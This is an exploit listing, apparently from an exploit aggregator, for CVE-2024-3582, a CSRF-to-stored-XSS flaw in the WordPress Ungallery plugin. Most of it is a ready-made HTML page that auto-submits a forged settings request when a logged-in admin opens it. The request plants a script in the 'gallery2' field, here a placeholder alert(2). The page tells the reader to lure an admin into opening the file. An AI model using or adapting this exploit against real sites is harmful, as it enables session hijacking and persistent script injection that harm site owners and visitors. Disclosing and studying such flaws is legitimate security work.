Exploit for Ungallery <= 2.2.4 - Stored XSS via CSRF CVE-2024-3582

Name: Exploit for Ungallery <= 2.2.4 - Stored XSS via CSRF CVE-2024-3582
Rating: 5 (102 reviews)

2024-04-18 | CVSS 5.9

## https://sploitus.com/exploit?id=WPEX-ID:5A348B5D-13AA-40C3-9D21-0554683F8019
Make a logged in admin open an HTML file containing the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=ungallerysettings" method="POST"> 
        <input type="hidden" name="mt_submit_hidden" value="Y">
        <input type="hidden" name="images_path" value="/var/www/html/wp-content/uploads/2024/01/*">
        <input type="hidden" name="URI" value="<? print get_bloginfo('url'); ?>/" >
        <input type="hidden" name="gallery" value="ungallery">
        <input type="hidden" name="version" value="2.2.4">
        <input type="hidden" name="gallery2" value='"><script>alert(2)</script>'>
        <input type="hidden" name="cache_dir" value="/var/www/html/wp-content/cache/">
        <button type="submit">Save Changes</button>
    </form>
</body>
```